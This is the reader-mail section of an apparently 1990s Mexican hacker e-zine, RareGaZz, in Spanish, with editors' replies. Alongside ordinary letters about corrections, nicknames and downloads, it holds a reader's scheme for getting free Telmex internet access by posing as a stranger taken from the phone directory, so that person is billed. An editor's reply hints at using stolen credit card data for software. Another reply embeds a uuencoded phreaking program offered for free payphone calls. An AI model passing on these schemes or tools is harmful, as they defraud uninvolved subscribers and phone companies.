a lo mejor, CULT OF THE DEAD COW ]
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
Que tal, yo de nuevo felicitandolos por su reva, quisiera decirles
que no existe el BBS Serpool en Puebla, existio! ahora son
provedores de i-net, el numero es 375170, no el 402334 como lo
decia en su reva en el articulo de Truco...
xDAWN
[ Ok nota tomada en cuenta. Thanx. ]
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
Le PompeItor, LePompeItor o Le PompaItor ???
[ Oficialmente es: "LePompeItor" PERO cuando iniciamos el habia elegido ser
conocido como "Le pompaItor". El error fue que el editor del segundo numero
lo bautizo como "Le pompeItor" cambiando una "a" por "e". Al principio
se puso una encabronada LePompeItor y recuerdo que una vez mientras
haciamos chat tratabamos de convencerlo yo y rare de que por una simple
letra no iba a pasar nada ... creimos haberlo convencido. 5 minutos despues
reviso el correo y aparece un mensaje con el subject "KILLERBAT" que
significa en espa¤ol "Vampiro Asesino". RareTrip me habla en el canal y
me dice que recibio un mensaje de LePompeItor con el subject "RARETRAP" que
significa "Trampa Rara". En ese momento entendi claramente que a pesar de
ser tan solo una letra, alteraba completamente el significado que para el
tenia su nickname. Ahora ya esta repuesto de ese trauma y esperamos que
luego regrese a la revista cuando termine sus examenes :-) ]
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
oye les paso un tip para accesso gratuito un mes en Telefonos de
mexico lo ke tienes ke hacer es hablar a uno de estos telefonos.
525 2412222 DESDE EL D.F.
91 80077634 Interior de la Republica.
Hablas y dice ke acabas comprar tu pakete de Internet de
Mxico en Sanborns y ke kieres activar tu cuenta como
dice hay en el manual pero dilo con seguridad para ke no
te pregunten nada agarra la seccion blanca y busca a un
ingenuo ke si la cuenta pasa del mes te cobran 240 a tu
recivo telefonico te pide nombre del ke sale el recibo es
del ke biene en la seccion bl. das los datos lo unico a conseguir
es la delegacion pero eso es facil...
El telefono del modem es : 3289928 D.F. otro estado pregunta.
Pregunta el DNS diles ke tienes NT y lo NECESITAS
P.D. Tiene Buena Velocidad !!!!!!
ATTN. AcidGum 97
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
Hola, acabo de visitar su pagina y se me hace muy buena, ¨hay modo de
recibir la revista por e-mail cada que sale? no les costaria mucho
trabajo y nos mantendrian contentos
Arturo Vega
[ Antes mandabamos la revista por email, pero era un pedo cuando rebotaban
los mensajes asi que por ahora solo podemos avisar a la lista cuando un
nuevo numero esta disponible. ]
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
Primero MUCHAS FELICIDADES !!!! esta muy suave su web page sigan asi ,
me gustaria comentarles que tambien ustedes deverian de sacar cosas
para macintosh tambien hay muchos usuarios de mac.
Saludos
Max
[ Ya incluimos algunos programas para Mac's en nuestra seccion de WareZ,
tambien en los links -seccion macintosh- encontraras varios lugares
con programas para mac's. Ahora que nuestros textos tratan de ser igual
de utiles para los usuarios de Mac's y Peces (excepto el warez incluido). ]
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
avisadme si cambiais la dirreccion, ok? =:)
[ Cuando nos mudemos de servidor (esperamos sea pronto) todos los de la
lista de correo seran notificados. Don't Worry! ]
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
Me encanta raregazz aunque baje dos veces eudora pro y nunca le pude hacer el
setup porque siempre le faltaron archivos.. como puedo hacerlo para que
termine bien el downloading?
[ Primer TRAGICO error de RareGaZz, al parecer el link para Eudora Pro no
servia :-( disculpas... ]
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
hola amigos de RAREGAZZ tengo algunas dudas que quisiera me pudieran
responder la primera es la sig. en la revista #3 en la seccion nueva
tecnologia hablan acerca de cybermedia yo baje ese programa y quisiera
saber si este tiene algun virus y si es asi que puedo hacer para quitarlo y
si no me pudieran conseguir una clave para registrarlo, otra duda es que
quise abrir una cuenta en hotmail y me regresa que hay un error en que el
login ya existe lo cambie varias veces y no me acepta ninguno sera que no
le caigo bien al servidor, otra duda es si cada que quiera usar el
anonymizer tengo que entrar a esta pagina primero, y por ultimo quisiera
que explicaran para gente como yo paso a paso como funciona el programa
phreak gracias por leer mi mensaje atte. yo
[ El programa de cybermedia es muy util, lo malo es que hay que pagar
a menos que consigas alguna informacion sobre una tarjeta de credito :)
Una cuenta en Hotmail...Humm, intenta www.gratismail.com
Para usar el anonymizer tienes que entrar a esa pagina, escoger
BEGIN SURFING ANONYMOUSLY y de ahi poner la URL a donde quieras ir.
El problema mas reciente es que a hotmail no le gusto que la gente entrara
a su sistema usando el anonimizador asi que bloqueo el servicio a los
usuarios del anonymizer, pero ahora podras usar el anonymizer en
www.gratismail.com!
Los programas PHREAK emulan los tonos de un telefono para que sin necesidad
de presionar los botones puedas marcar algun numero. Las mas comunes son
BLUE BOX y SILVER BOX. A continuacion viene el codigo UUENCODE de un
programa que emula las 2 cajas y la RED BOX que son los tonos que hacen
las monedas al caer al telefono publico. Asegurate de leer el texto de
TRUCO en este numero y podras llamar gratis de cualquier telefono
publico usando este programita... ;-) ]
begin 644
box.zip
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
M*T-?5S)H;4!!KD$%V@2Z#0UH"#=NPL0S]H;Q@`)QC.1PV6#-U4/]$$_75U
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
MOI6^DRZD'Z>:\S[C,>,BH9=8PW#"6CG3'$T#+&&99,+G,"<SIS%M.7&<Y<
MQES%W,[<Q4QDIC(/,R7,T\SSS)O,N\Q"9@6SAOF*V<+L80XPQYD0ZV_+AY;/
M+&LL&RTSK'.M+UA?M;YC/6CMSM[-_H5=Q@[BA'!6<:(XNSB)G/T<$><H)YTC
MY5SD7.?\PWG&J>$T<SHX.$?'@;D<KC-W.M>?&\)=P=W(C><F<0]QT[E1-AMM
MMMCLMA'9I-N<L,FS^<7FALT=FW]LZFW>V;38X#9JFU$;NJV5K8VMH^TFVSC;
M([8/;3';F7:K[7ZR@^Q][7?8?[(/FI`_H6X"XA#N(';H=%@V\=9$KF.RH](Q
M<-*12263AB9-==KD]-3)UMG+>;'S5N>#SJ>=;SN#+FMX.W@'>&+>+5X3KXV'
M\"_Q7=VVN_FX+W*/<H]W%[JKW&E3)DYQG@IZ.L_DSK+QG^4?YA_G#_Q_V_\#
M4$L#!!0``@`(```(C">T<9^YI0$``#<#```,````24Y35%)50T,N5%A4A5)!
M;MPP#+P;\!_8^W8//>:X@%L47:1!TA:YTA*[52"+&U$*X-]W9#N;+7*H#S9,
MS9`S(_8=_?\Y?'_<#X]#W_7=8$7HG/64>6(Z29+,%-6H:,+;"]5$J4Z2E9Q.
M^#DS$%:IFI*D%2M1?C=\WYWK&(-;F:7BU'$,GOV>CDK/52B)$PN%K9%K8BJ<
MGZ1P(YBFX'6'<M\Y-I,"<?."@KZ1O>8%-VJT$*/NZ4LK7^EM$^#&5[>,WWKW
MW:4Y<:2)L^-\96RF6.6D]"+$"VWS0YL;,(R<@)6T[[A-&-'`JN0B<(;3D*SD
MZES0)-9FW;1T:7@25V'N*G&BCX34D>(2P:00=3C^'!;,"KAK$;]3*:G@L\-T
M!*C(Y!["Q5P.HY#$5UB+P(L)6VNUY);W=/=*&FY_#(WXEIGARA-LSVH?UOD/
MX3+$Z/,G#/E7[L/7XZ^E"?\)""OY=KA&O[)R:]\ZK9H,+A"FYN5K`=@@@&[J
MWCQN_F\5^W%ST?*"[OP.NULK,.&Q`5A))"W)!<9=N%AGR%+4<3BW/DY]P!4O
M"[F-^88=DGS0TG=_`5!+`0(4`!0``@`(```(C"?HCU.1!B```(<A```'````
M````````(`#_@0````!"3U@N15A%4$L!`A0`%``"``@```B,)[1QG[FE`0``
M-P,```P``````````0`@`+:!*R```$E.4U1254-#+E185%!+!08``````@`"
+`&\```#Z(0``````
`
end
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
Que tal, pueden comunicarse por telnet al 148.228.75.5
el login es bbs y en el password solo enter...
Para entrar como invitado en userid: es guest y passwd igual.
Me he dado cuenta que solo es entre semana,
Por cierto, ¨Cuantas llaves publicas tienen?
